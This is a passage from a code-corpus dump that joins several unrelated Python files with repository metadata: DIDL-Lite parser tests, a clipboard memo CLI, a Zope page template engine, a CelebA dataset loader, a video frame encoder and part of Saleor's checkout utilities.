descriptor_el = item_el.find("./didl_lite:desc", NAMESPACES)
assert descriptor_el is not None
assert len(descriptor_el.attrib) == 3
assert descriptor_el.attrib["id"] == "1"
assert descriptor_el.attrib["nameSpace"] == "ns"
assert descriptor_el.attrib["type"] == "type"
assert descriptor_el.text == "Text"
descriptor = didl_lite.Descriptor(id="2", name_space="ns2")
descriptor_el = descriptor.to_xml()
assert descriptor_el is not None
assert len(descriptor_el.attrib) == 2
assert descriptor_el.attrib["id"] == "2"
assert descriptor_el.attrib["nameSpace"] == "ns2"
def test_descriptor_repr(self) -> None:
"""Test descriptor's repr can convert back to an equivalent descriptorb."""
from didl_lite.didl_lite import Descriptor
descriptor = Descriptor(id="1", name_space="ns", type="type", text="Text")
descriptor_repr = repr(descriptor)
descriptor_remade = eval(descriptor_repr)
assert ET.tostring(descriptor.to_xml()) == ET.tostring(
descriptor_remade.to_xml()
)
def test_item_order(self) -> None:
"""Test item ordering."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item id="0" parentID="0" restricted="1">
<dc:title>Audio Item Title 1</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
</item>
<container id="1" parentID="0" restricted="1">
<dc:title>Album Container Title</dc:title>
<upnp:class>object.container.album</upnp:class>
</container>
<item id="2" parentID="0" restricted="1">
<dc:title>Audio Item Title 1</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 3
assert isinstance(items[0], didl_lite.AudioItem)
assert isinstance(items[1], didl_lite.Album)
assert isinstance(items[2], didl_lite.AudioItem)
def test_item_property_attribute_from_xml(self) -> None:
"""Test item property from XML attribute."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item id="0" parentID="0" restricted="1">
<dc:title>Video Item Title</dc:title>
<upnp:class>object.item.videoItem</upnp:class>
<upnp:genre id="genreId">Action</upnp:genre>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
item = items[0]
assert item is not None
assert getattr(item, "genre") == "Action"
assert getattr(item, "genre_id") == "genreId"
def test_item_property_attribute_to_xml(self) -> None:
"""Test item property to XML."""
item = didl_lite.VideoItem(
id="0",
parent_id="0",
title="Video Item Title",
restricted="1",
genre="Action",
genre_id="genreId",
)
didl_string = didl_lite.to_xml_string(item).decode("utf-8")
didl_el = ET.fromstring(didl_string)
item_el = didl_el.find("./didl_lite:item", NAMESPACES)
assert item_el is not None
genre_el = item_el.find("./upnp:genre", NAMESPACES)
assert genre_el is not None
assert genre_el.text == "Action"
assert genre_el.attrib["id"] == "genreId"
def test_item_missing_id(self) -> None:
"""Test item missing ID from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item restricted="1">
<dc:title>Video Item Title</dc:title>
<upnp:class>object.item</upnp:class>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
def test_item_set_attributes(self) -> None:
"""Test item attribute from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item restricted="1">
<dc:title>Video Item Title</dc:title>
<upnp:class>object.item.videoItem</upnp:class>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
item = items[0]
assert getattr(item, "title") == "Video Item Title"
assert hasattr(item, "rating")
assert getattr(item, "rating") is None
assert isinstance(item, didl_lite.VideoItem)
assert len(item.res) == 0
assert item.res == item.resources
def test_extra_properties(self) -> None:
"""Test extra item properties from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item restricted="1">
<dc:title>Video Item Title</dc:title>
<upnp:class>object.item.videoItem</upnp:class>
<upnp:albumArtURI>extra_property</upnp:albumArtURI>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
item = items[0]
assert hasattr(item, "album_art_uri")
assert getattr(item, "album_art_uri") == "extra_property"
def test_default_properties_set(self) -> None:
"""Test defaults for item properties."""
item = didl_lite.VideoItem(
id="0", parent_id="0", title="Video Item Title", restricted="1"
)
assert hasattr(item, "genre_type") # property is set
| 38.017452
| 88
| 0.603011
|
81dad8788b27ec864efe21e8441e1148d844e2f0
| 3,657
|
py
|
Python
|
clipboard_memo/main.py
|
arafsheikh/clipboard-memo
|
7e851b2e70063af878f0b8cef075f6923b2809cb
|
[
"MIT"
] | null | null | null |
clipboard_memo/main.py
|
arafsheikh/clipboard-memo
|
7e851b2e70063af878f0b8cef075f6923b2809cb
|
[
"MIT"
] | null | null | null |
clipboard_memo/main.py
|
arafsheikh/clipboard-memo
|
7e851b2e70063af878f0b8cef075f6923b2809cb
|
[
"MIT"
] | null | null | null |
"""
A command line clipboard manager
"""
from pyperclip import copy, paste
import cPickle as pickle
import argparse, sys, os
class ClipboardMemo(object):
def __init__(self):
#Create directory to save dump file
if not os.path.exists(os.path.expanduser('~/.clipboard_memo/')):
os.makedirs(os.path.expanduser('~/.clipboard_memo/'))
self.dbpath = os.path.expanduser('~/.clipboard_memo/dump.p')
try:
self.memos = pickle.load(open(self.dbpath, 'rb')) #Load saved memos
except IOError:
#If dump doesn't exist create new
self.memos = []
def run(self):
"""Parse and run"""
parser = argparse.ArgumentParser(
description='Save clipboard data as memos',
usage='''clipboard_memo <command> [<args>]
Available commands are:
save Save the contents of clipboard
delete INDEX Delete a memo of given index number
delete -a | --all Delete all saved memos
ls List all saved memos
yank INDEX Copy a memo to clipboard
''')
parser.add_argument('command', help='Subcommand to run')
args = parser.parse_args(sys.argv[1:2]) #Parse only the first argument
if not hasattr(self, args.command):
print 'Unrecognized command'
parser.print_help()
exit(1)
#Execute the given command
getattr(self, args.command)()
def commit(self):
"""Save the current memos to memory."""
pickle.dump(self.memos, open(self.dbpath, 'wb'))
def save(self):
"""Save a new memo to the memos list."""
text = str(paste()) #Data from clipboard
if not bool(text):
exit() #Nothing to save
text = text.encode('utf-8') #Clean string
text = text.strip() #Get rid of whitespaces
self.memos.append(text)
self.commit()
def delete(self):
"""Deletes the memos of the given index number."""
parser = argparse.ArgumentParser(
description='Delete memo of the given index number from clipboard')
parser.add_argument('-i', '--index', type=int, help='Index of the memo to delete')
parser.add_argument('-a', '--all', help='Delete all memos', action='store_true')
args = parser.parse_args(sys.argv[2:])
#Delete all memos
if args.all:
self.memos = [] #Delete all memos
self.commit()
exit(0)
#If index number is provided then delete the particular memo
if args.index:
try:
del self.memos[args.index - 1] #Since we enumerate from 1 instead of 0
except TypeError:
print 'Integer required'
self.commit()
else:
print 'Too few arguments. Provide the index number of memo to delete'
def ls(self):
"""Lists all saved memos."""
print '\n'.join(str(i) for i in enumerate(self.memos, start=1))
def yank(self):
"""Copy the memo corresponding to the given index number to clipboard."""
parser = argparse.ArgumentParser(
description='''Copy the memo corresponding to the given index number
to clipboard''')
parser.add_argument('index', type=int)
args = parser.parse_args(sys.argv[2:])
try:
copy(str(self.memos[args.index - 1])) #Since we enumerate from 1 instead of 0
        except (TypeError, IndexError):
            pass #invalid or out-of-range index; nothing to copy
def main():
c = ClipboardMemo()
c.run()
if __name__ == '__main__':
main()
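# Example invocations (a sketch: this assumes the package exposes the module as a
# `clipboard_memo` console script; otherwise run it as `python main.py <command>`):
#   clipboard_memo save           # save the current clipboard contents as a memo
#   clipboard_memo ls             # list saved memos with their index numbers
#   clipboard_memo yank 2         # copy memo #2 back to the clipboard
#   clipboard_memo delete -i 2    # delete memo #2
#   clipboard_memo delete --all   # delete every saved memo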
| 32.078947
| 92
| 0.581898
|
75c952b2fef872c35cda4ca91efedcbc680463b3
| 4,022
|
py
|
Python
|
src/Products/PageTemplates/engine.py
|
dek4nice/Zope
|
ec4765fc0007c4e78aafcbeef510077444f8551a
|
[
"ZPL-2.1"
] | 1
|
2018-11-30T12:39:27.000Z
|
2018-11-30T12:39:27.000Z
|
src/Products/PageTemplates/engine.py
|
dek4nice/Zope
|
ec4765fc0007c4e78aafcbeef510077444f8551a
|
[
"ZPL-2.1"
] | null | null | null |
src/Products/PageTemplates/engine.py
|
dek4nice/Zope
|
ec4765fc0007c4e78aafcbeef510077444f8551a
|
[
"ZPL-2.1"
] | 1
|
2018-11-30T12:39:34.000Z
|
2018-11-30T12:39:34.000Z
|
import re
import logging
from zope.interface import implementer
from zope.interface import provider
from zope.pagetemplate.interfaces import IPageTemplateEngine
from zope.pagetemplate.interfaces import IPageTemplateProgram
from z3c.pt.pagetemplate import PageTemplate as ChameleonPageTemplate
from AccessControl.class_init import InitializeClass
from AccessControl.SecurityInfo import ClassSecurityInfo
from Products.PageTemplates.Expressions import getEngine
from Products.PageTemplates import ZRPythonExpr
from chameleon.tales import StringExpr
from chameleon.tales import NotExpr
from chameleon.tal import RepeatDict
from z3c.pt.expressions import PythonExpr, ProviderExpr
from .expression import PathExpr
from .expression import TrustedPathExpr
from .expression import NocallExpr
from .expression import ExistsExpr
from .expression import UntrustedPythonExpr
# Declare Chameleon's repeat dictionary public
RepeatDict.security = ClassSecurityInfo()
RepeatDict.security.declareObjectPublic()
RepeatDict.__allow_access_to_unprotected_subobjects__ = True
InitializeClass(RepeatDict)
re_match_pi = re.compile(r'<\?python([^\w].*?)\?>', re.DOTALL)
logger = logging.getLogger('Products.PageTemplates')
@implementer(IPageTemplateProgram)
@provider(IPageTemplateEngine)
class Program(object):
# Zope 2 Page Template expressions
secure_expression_types = {
'python': UntrustedPythonExpr,
'string': StringExpr,
'not': NotExpr,
'exists': ExistsExpr,
'path': PathExpr,
'provider': ProviderExpr,
'nocall': NocallExpr,
}
# Zope 3 Page Template expressions
expression_types = {
'python': PythonExpr,
'string': StringExpr,
'not': NotExpr,
'exists': ExistsExpr,
'path': TrustedPathExpr,
'provider': ProviderExpr,
'nocall': NocallExpr,
}
extra_builtins = {
'modules': ZRPythonExpr._SecureModuleImporter()
}
def __init__(self, template):
self.template = template
def __call__(self, context, macros, tal=True, **options):
if tal is False:
return self.template.body
# Swap out repeat dictionary for Chameleon implementation
# and store wrapped dictionary in new variable -- this is
# in turn used by the secure Python expression
# implementation whenever a 'repeat' symbol is found
kwargs = context.vars
kwargs['wrapped_repeat'] = kwargs['repeat']
kwargs['repeat'] = RepeatDict(context.repeat_vars)
return self.template.render(**kwargs)
@classmethod
def cook(cls, source_file, text, engine, content_type):
if engine is getEngine():
def sanitize(m):
match = m.group(1)
logger.info(
'skipped "<?python%s?>" code block in '
'Zope 2 page template object "%s".',
match, source_file
)
return ''
text, count = re_match_pi.subn(sanitize, text)
if count:
logger.warning(
"skipped %d code block%s (not allowed in "
"restricted evaluation scope)." % (
count, 's' if count > 1 else ''
)
)
expression_types = cls.secure_expression_types
else:
expression_types = cls.expression_types
# BBB: Support CMFCore's FSPagetemplateFile formatting
if source_file is not None and source_file.startswith('file:'):
source_file = source_file[5:]
if source_file is None:
# Default to '<string>'
source_file = ChameleonPageTemplate.filename
template = ChameleonPageTemplate(
text, filename=source_file, keep_body=True,
expression_types=expression_types,
encoding='utf-8', extra_builtins=cls.extra_builtins,
)
return cls(template), template.macros
| 31.669291
| 71
| 0.657882
|
1e5fa2570f3995fe7e7fa51c631e060f0e80fbb8
| 8,666
|
py
|
Python
|
awesome_gans/stargan/dataset.py
|
StevenJokess/Awesome-GANs
|
b78410e072ec3c0c39a4dac853dea7c219817c65
|
[
"MIT"
] | 739
|
2017-05-28T18:07:38.000Z
|
2022-03-28T23:57:42.000Z
|
awesome_gans/stargan/dataset.py
|
StevenJokess/Awesome-GANs
|
b78410e072ec3c0c39a4dac853dea7c219817c65
|
[
"MIT"
] | 25
|
2018-01-18T07:09:07.000Z
|
2021-08-25T14:11:09.000Z
|
awesome_gans/stargan/dataset.py
|
StevenJokess/Awesome-GANs
|
b78410e072ec3c0c39a4dac853dea7c219817c65
|
[
"MIT"
] | 185
|
2017-07-15T05:18:10.000Z
|
2022-02-17T10:17:02.000Z
|
import os
from glob import glob
import h5py
import numpy as np
from scipy.misc import imread, imresize
from tqdm import tqdm
'''
This dataset is for Celeb-A
- Celeb-A
Celeb-A DataSets can be downloaded at http://mmlab.ie.cuhk.edu.hk/projects/CelebA.html
Celeb-A link : https://drive.google.com/drive/folders/0B7EVK8r0v71pTUZsaXdaSnZBZzg
    Alternatively, you can download it with the following Python code (though it did not work reliably when I tried it)
code link : https://github.com/carpedm20/DCGAN-tensorflow/blob/master/download.py
'''
DataSets = {
# Linux
# 'celeb-a': '/home/zero/hdd/DataSet/Celeb-A/img_align_celeba/',
# 'celeb-a-attr': '/home/zero/hdd/DataSet/Celeb-A/list_attr_celeba.txt',
# 'celeb-a-32x32-h5': '/home/zero/hdd/DataSet/Celeb-A/celeb-a-32x32.h5',
# 'celeb-a-64x64-h5': '/home/zero/hdd/DataSet/Celeb-A/celeb-a-64x64.h5',
# Windows
'celeb-a': 'D:\\DataSet\\Celeb-A\\img_align_celeba\\',
'celeb-a-attr': 'D:\\DataSet\\Celeb-A\\list_attr_celeba.txt',
'celeb-a-32x32-h5': 'D:\\DataSet\\Celeb-A\\celeb-a-32x32.h5',
'celeb-a-64x64-h5': 'D:\\DataSet\\Celeb-A\\celeb-a-64x64.h5',
}
class CelebADataSet:
def __init__(
self,
batch_size=128,
input_height=64,
input_width=64,
input_channel=3,
attr_labels=(),
output_height=64,
output_width=64,
output_channel=3,
split_rate=0.2,
random_state=42,
num_threads=8,
mode='w',
):
"""
# General Settings
:param batch_size: training batch size, default 128
:param input_height: input image height, default 64
:param input_width: input image width, default 64
:param input_channel: input image channel, default 3 (RGB)
- in case of Celeb-A, image size is 64x64x3(HWC).
:param attr_labels: attributes of Celeb-A image, default empty tuple
- in case of Celeb-A, the number of attributes is 40
# Output Settings
:param output_height: output images height, default 64
:param output_width: output images width, default 64
:param output_channel: output images channel, default 3
# Pre-Processing Option
:param split_rate: image split rate (into train & test), default 0.2
:param random_state: random seed for shuffling, default 42
:param num_threads: the number of threads for multi-threading, default 8
# DataSet Option
:param mode: file mode(RW), default w
"""
self.batch_size = batch_size
self.input_height = input_height
self.input_width = input_width
self.input_channel = input_channel
'''
# Available attributes
[
5_o_Clock_Shadow, Arched_Eyebrows, Attractive, Bags_Under_Eyes, Bald, Bangs, Big_Lips, Big_Nose, Black_Hair,
Blond_Hair, Blurry, Brown_Hair, Bushy_Eyebrows, Chubby, Double_Chin, Eyeglasses, Goatee, Gray_Hair,
Heavy_Makeup, High_Cheekbones, Male, Mouth_Slightly_Open, Mustache, Narrow_Eyes, No_Beard, Oval_Face,
Pale_Skin, Pointy_Nose, Receding_Hairline, Rosy_Cheeks, Sideburns, Smiling, Straight_Hair, Wavy_Hair,
Wearing_Earrings, Wearing_Hat, Wearing_Lipstick, Wearing_Necklace, Wearing_Necktie, Young
]
'''
self.attr_labels = attr_labels
self.image_shape = [self.batch_size, self.input_height, self.input_width, self.input_channel]
self.output_height = output_height
self.output_width = output_width
self.output_channel = output_channel
self.split_rate = split_rate
self.random_state = random_state
        self.num_threads = num_threads  # change this value to one suited to your system
self.mode = mode
self.path = "" # DataSet path
self.files = "" # files' name
self.n_classes = 0 # DataSet the number of classes, default 10
self.data = [] # loaded images
self.attr = []
self.num_images = 202599
self.images = []
self.labels = {}
self.ds_name = "" # DataSet Name (by image size)
self.celeb_a(mode=self.mode) # load Celeb-A
def celeb_a(self, mode):
def get_image(path, w, h):
img = imread(path).astype(np.float)
orig_h, orig_w = img.shape[:2]
new_h = int(orig_h * w / orig_w)
img = imresize(img, (new_h, w))
margin = int(round((new_h - h) / 2))
return img[margin : margin + h]
if self.input_height == 32:
self.ds_name = 'celeb-a-32x32-h5'
elif self.input_height == 64:
self.ds_name = 'celeb-a-64x64-h5'
self.labels = self.load_attr() # selected attributes info (list)
if mode == 'w':
self.files = glob(os.path.join(DataSets['celeb-a'], "*.jpg"))
self.files = np.sort(self.files)
self.data = np.zeros(
(len(self.files), self.input_height * self.input_width * self.input_channel), dtype=np.uint8
)
print("[*] Image size : ", self.data.shape)
assert len(self.files) == self.num_images
for n, f_name in tqdm(enumerate(self.files)):
image = get_image(f_name, self.input_width, self.input_height)
self.data[n] = image.flatten()
# write .h5 file for reusing later...
with h5py.File(''.join([DataSets[self.ds_name]]), 'w') as f:
f.create_dataset("images", data=self.data)
self.images = self.load_data(size=self.num_images)
def load_data(self, size, offset=0):
"""
From great jupyter notebook by Tim Sainburg:
http://github.com/timsainb/Tensorflow-MultiGPU-VAE-GAN
"""
with h5py.File(DataSets[self.ds_name], 'r') as hf:
faces = hf['images']
full_size = len(faces)
if size is None:
size = full_size
n_chunks = int(np.ceil(full_size / size))
if offset >= n_chunks:
print("[*] Looping from back to start.")
offset = offset % n_chunks
if offset == n_chunks - 1:
print("[-] Not enough data available, clipping to end.")
faces = faces[offset * size :]
else:
faces = faces[offset * size : (offset + 1) * size]
faces = np.array(faces, dtype=np.float16)
print("[+] Image size : ", faces.shape)
return faces / 255.0
def load_attr(self):
with open(DataSets['celeb-a-attr'], 'r') as f:
img_attr = []
self.num_images = int(f.readline().strip())
self.attr = (f.readline().strip()).split(' ')
print("[*] the number of images : %d" % self.num_images)
print("[*] the number of attributes : %d/%d" % (len(self.attr_labels), len(self.attr)))
for fn in f.readlines():
row = fn.strip().split()
# img_name = row[0]
attr = [int(x) for x in row[1:]]
tmp = [attr[self.attr.index(x)] for x in self.attr_labels]
tmp = [1.0 if x == 1 else 0.0 for x in tmp] # one-hot labeling
img_attr.append(tmp)
return np.asarray(img_attr)
def concat_data(self, img, label):
label = np.tile(
np.reshape(label, [-1, 1, 1, len(self.attr_labels)]), [1, self.input_height, self.input_width, 1]
)
return np.concatenate([img, label], axis=3)
class DataIterator:
def __init__(self, x, y, batch_size, label_off=False):
self.x = x
self.label_off = label_off
if not self.label_off:
self.y = y
self.batch_size = batch_size
self.num_examples = num_examples = x.shape[0]
self.num_batches = num_examples // batch_size
self.pointer = 0
assert self.batch_size <= self.num_examples
def next_batch(self):
start = self.pointer
self.pointer += self.batch_size
if self.pointer > self.num_examples:
perm = np.arange(self.num_examples)
np.random.shuffle(perm)
self.x = self.x[perm]
if not self.label_off:
self.y = self.y[perm]
start = 0
self.pointer = self.batch_size
end = self.pointer
if not self.label_off:
return self.x[start:end], self.y[start:end]
else:
return self.x[start:end]
def iterate(self):
for step in range(self.num_batches):
yield self.next_batch()
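# A minimal usage sketch, assuming the Celeb-A files exist at the paths configured in
# DataSets and the 64x64 .h5 dump has already been written once with mode='w'
# (the attribute names below are illustrative):
# ds = CelebADataSet(batch_size=64, attr_labels=('Male', 'Smiling'), mode='r')
# it = DataIterator(ds.images, ds.labels, batch_size=64)
# for batch_x, batch_y in it.iterate():
#     pass  # batch_x: (64, 64*64*3) float16 images in [0, 1]; batch_y: one-hot attributes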
| 34.252964
| 117
| 0.591045
|
181e6ca922877292b1f05a1d493ccb1f3f2ef2b9
| 613
|
py
|
Python
|
server/utils/choice.py
|
yseiren87/jellicleSpace
|
10d693bbc04e6b89a7ce15d2dc9797cec2a553b7
|
[
"Apache-2.0"
] | null | null | null |
server/utils/choice.py
|
yseiren87/jellicleSpace
|
10d693bbc04e6b89a7ce15d2dc9797cec2a553b7
|
[
"Apache-2.0"
] | 7
|
2021-03-19T04:47:00.000Z
|
2021-09-22T19:10:46.000Z
|
server/utils/choice.py
|
yseiren87/jellicleSpace
|
10d693bbc04e6b89a7ce15d2dc9797cec2a553b7
|
[
"Apache-2.0"
] | null | null | null |
from .log import LogUtil
class Choice:
def __init__(self, key, verbose):
self.key = key
self.verbose = verbose
class ChoiceUtil:
@classmethod
def get_choice(cls):
choice = []
for _k in cls.__dict__.keys():
if not _k.startswith("__") and not _k.endswith("__"):
_v = cls.__dict__[_k]
if type(_v) != Choice:
LogUtil.red("Check a '%s' class. elements must be 'Choice' type ..." % cls.__name__)
return None
choice.append((_v.key, _v.verbose))
return choice
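# A minimal usage sketch; the GenderChoice subclass is hypothetical and only shows how
# Choice and ChoiceUtil are meant to be combined:
# class GenderChoice(ChoiceUtil):
#     MALE = Choice("M", "Male")
#     FEMALE = Choice("F", "Female")
#
# GenderChoice.get_choice()  # -> [('M', 'Male'), ('F', 'Female')]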
| 22.703704
| 104
| 0.530179
|
ed1487901aa936467f1600c91ea569d0b6e87a91
| 5,420
|
py
|
Python
|
reference/lvenc/encoder.py
|
tuxzz/lightvideo
|
3654d7a452ec42a7e2d40129ef571375e5f93ddb
|
[
"MIT"
] | 2
|
2019-05-05T22:37:19.000Z
|
2021-05-17T03:32:44.000Z
|
reference/lvenc/encoder.py
|
tuxzz/lightvideo
|
3654d7a452ec42a7e2d40129ef571375e5f93ddb
|
[
"MIT"
] | null | null | null |
reference/lvenc/encoder.py
|
tuxzz/lightvideo
|
3654d7a452ec42a7e2d40129ef571375e5f93ddb
|
[
"MIT"
] | null | null | null |
import numpy as np
import ctypes, io, struct
from .struct import *
from . import enccore, clz4, report
import signal, threading, multiprocessing, time
import cv2
_LZ4_COMPRESSION_LEVEL = 11
class DelayedKeyboardInterrupt(object):
def __enter__(self):
self.signal_received = False
self.old_handler = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, self.handler)
def handler(self, sig, frame):
self.signal_received = (sig, frame)
def __exit__(self, type, value, traceback):
if(self.old_handler is not None):
signal.signal(signal.SIGINT, self.old_handler)
if(self.signal_received):
self.old_handler(*self.signal_received)
class Encoder:
def __init__(self, stream, width, height, framerate, dtype, nFullSizeChannel, nHalfSizeChannel, **kwargs):
self.stream = stream
self.stream.seek(ctypes.sizeof(MainStruct))
self.width = int(width)
self.height = int(height)
self.framerate = int(framerate)
self.dtype = dtype
self.userData = np.uint64(kwargs.get("userData", 0))
self.dropThreshold = int(kwargs.get("dropThreshold", 1 if self.dtype == np.uint8 else 128))
if(not self.dtype in (np.uint8, np.uint16)):
raise TypeError("Only uint8 and uint16 is supported")
self.nFullSizeChannel = int(nFullSizeChannel)
self.nHalfSizeChannel = int(nHalfSizeChannel)
if(self.nHalfSizeChannel < 0 or self.nHalfSizeChannel > 4):
raise ValueError("Channel layout for each type must be in range [0, 4]")
if(self.nFullSizeChannel < 0 or self.nFullSizeChannel > 4):
raise ValueError("Channel layout for each type must be in range [0, 4]")
if(self.nHalfSizeChannel + self.nFullSizeChannel <= 0):
raise ValueError("Total channel count must be greater than 0")
wInvalid = self.width <= 0 or self.width > 32767
hInvalid = self.height <= 0 or self.height > 32767
if(wInvalid or hInvalid):
raise ValueError("width and height must be in range [1, 32767]")
if(self.framerate <= 0 or self.framerate > 255):
raise ValueError("framerate must be in range [1, 255]")
elif(self.dropThreshold > 65535):
raise ValueError("dropThreshold for 16bit color format must be less than 65536")
self.prevImgList = None
self.prevFullImgList = None
self.nFrame = 0
def __enter__(self):
return self
def __exit__(self, type, value, trace):
with DelayedKeyboardInterrupt():
self.stream.seek(0)
mainStruct = MainStruct()
mainStruct.aria = b'ARiA'
mainStruct.version = 0
mainStruct.nChannel = self.nFullSizeChannel | (self.nHalfSizeChannel << 4)
mainStruct.flags = int(self.dtype == np.uint16)
mainStruct.framerate = self.framerate
mainStruct.width = self.width
mainStruct.height = self.height
mainStruct.nFrame = self.nFrame
mainStruct.userData = np.uint64(self.userData)
self.stream.write(mainStruct)
self.stream.seek(0, io.SEEK_END)
self.stream.flush()
def __del__(self):
pass
def feedFrame(self, fullImg, halfImg):
assert fullImg is None or (fullImg.ndim == 3 and fullImg.dtype == self.dtype and fullImg.shape[-1] == self.nFullSizeChannel)
assert halfImg is None or (halfImg.ndim == 3 and halfImg.dtype == self.dtype and halfImg.shape[-1] == self.nHalfSizeChannel)
assert fullImg is not None or halfImg is not None
report.enter("frame %d" % self.nFrame)
if(fullImg is not None and halfImg is not None):
iFull = 0
iHalf = 1
imgList = [fullImg, halfImg]
elif(fullImg is not None):
iFull = 0
imgList = [fullImg]
else:
iHalf = 1
imgList = [halfImg]
# do filter
result = enccore.applyBestFilter(imgList, self.prevFullImgList, self.prevImgList, self.dropThreshold)
# serialize and compress
vf = VideoFrameStruct()
vf.vfrm = b'VFRM'
vf.referenceType = result["deltaMethod"]
if(fullImg is not None):
vf.intraMethod[0] = result["bestResult"][iFull]["intraMethod"]
if(halfImg is not None):
vf.intraMethod[1] = result["bestResult"][iHalf]["intraMethod"]
data = io.BytesIO()
for channelResult in result["bestResult"]:
data.write(channelResult["filtered"])
# write
data = clz4.LZ4CompressionTask(data.getvalue(), clz4.COMPRESS_MODE_HC, _LZ4_COMPRESSION_LEVEL).get()
vf.size = len(data)
with DelayedKeyboardInterrupt():
self.stream.write(vf)
self.stream.write(data)
self.nFrame += 1
self.prevImgList = []
for channelResult in result["bestResult"]:
self.prevImgList.append(channelResult["decompressed"])
if(result["deltaMethod"] == REFERENCE_NONE):
self.prevFullImgList = self.prevImgList
# clean up
report.leave()
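# A minimal usage sketch (file name and frame contents are hypothetical; a real caller
# would feed decoded video frames in a loop):
# with open("out.lv", "wb") as f:
#     with Encoder(f, 640, 480, 30, np.uint8, nFullSizeChannel=3, nHalfSizeChannel=0) as enc:
#         frame = np.zeros((480, 640, 3), dtype=np.uint8)
#         enc.feedFrame(frame, None)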
| 39.275362
| 133
| 0.602952
|
4cf4e4d546d2ba01bffbb13bb51a63680f2358ee
| 22,975
|
py
|
Python
|
saleor/saleor/checkout/utils.py
|
nguyentrung194/e-com
|
e1fbf6259ba832040b9cf0ec6a7adf1b43a8539a
|
[
"BSD-3-Clause"
] | null | null | null |
saleor/saleor/checkout/utils.py
|
nguyentrung194/e-com
|
e1fbf6259ba832040b9cf0ec6a7adf1b43a8539a
|
[
"BSD-3-Clause"
] | null | null | null |
saleor/saleor/checkout/utils.py
|
nguyentrung194/e-com
|
e1fbf6259ba832040b9cf0ec6a7adf1b43a8539a
|
[
"BSD-3-Clause"
] | null | null | null |
"""Checkout-related utility functions."""
from decimal import Decimal
from typing import TYPE_CHECKING, Iterable, List, Optional, Tuple
import graphene
from django.core.exceptions import ValidationError
from django.utils import timezone
from prices import Money
from ..account.models import User
from ..core.exceptions import ProductNotPublished
from ..core.taxes import zero_taxed_money
from ..core.utils.promo_code import (
InvalidPromoCode,
promo_code_is_gift_card,
promo_code_is_voucher,
)
from ..discount import DiscountInfo, VoucherType
from ..discount.models import NotApplicable, Voucher
from ..discount.utils import (
get_products_voucher_discount,
validate_voucher_for_checkout,
)
from ..giftcard.utils import (
add_gift_card_code_to_checkout,
remove_gift_card_code_from_checkout,
)
from ..plugins.manager import PluginsManager
from ..product import models as product_models
from ..shipping.models import ShippingMethod
from ..warehouse.availability import check_stock_quantity, check_stock_quantity_bulk
from . import AddressType, calculations
from .error_codes import CheckoutErrorCode
from .fetch import (
update_checkout_info_shipping_address,
update_checkout_info_shipping_method,
)
from .models import Checkout, CheckoutLine
if TYPE_CHECKING:
# flake8: noqa
from prices import TaxedMoney
from ..account.models import Address
from .fetch import CheckoutInfo, CheckoutLineInfo
def get_user_checkout(
user: User, checkout_queryset=Checkout.objects.all()
) -> Optional[Checkout]:
return checkout_queryset.filter(user=user, channel__is_active=True).first()
def check_variant_in_stock(
checkout: Checkout,
variant: product_models.ProductVariant,
channel_slug: str,
quantity: int = 1,
replace: bool = False,
check_quantity: bool = True,
) -> Tuple[int, Optional[CheckoutLine]]:
"""Check if a given variant is in stock and return the new quantity + line."""
line = checkout.lines.filter(variant=variant).first()
line_quantity = 0 if line is None else line.quantity
new_quantity = quantity if replace else (quantity + line_quantity)
if new_quantity < 0:
raise ValueError(
"%r is not a valid quantity (results in %r)" % (quantity, new_quantity)
)
if new_quantity > 0 and check_quantity:
check_stock_quantity(
variant, checkout.get_country(), channel_slug, new_quantity
)
return new_quantity, line
def add_variant_to_checkout(
checkout_info: "CheckoutInfo",
variant: product_models.ProductVariant,
quantity: int = 1,
replace: bool = False,
check_quantity: bool = True,
):
"""Add a product variant to checkout.
If `replace` is truthy then any previous quantity is discarded instead
of added to.
"""
checkout = checkout_info.checkout
product_channel_listing = product_models.ProductChannelListing.objects.filter(
channel_id=checkout.channel_id, product_id=variant.product_id
).first()
if not product_channel_listing or not product_channel_listing.is_published:
raise ProductNotPublished()
new_quantity, line = check_variant_in_stock(
checkout,
variant,
checkout_info.channel.slug,
quantity=quantity,
replace=replace,
check_quantity=check_quantity,
)
if line is None:
line = checkout.lines.filter(variant=variant).first()
if new_quantity == 0:
if line is not None:
line.delete()
elif line is None:
checkout.lines.create(checkout=checkout, variant=variant, quantity=new_quantity)
elif new_quantity > 0:
line.quantity = new_quantity
line.save(update_fields=["quantity"])
return checkout
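# Worked example of the `replace` semantics above (values are illustrative): with an
# existing line quantity of 2 and an incoming quantity of 3, replace=False yields a
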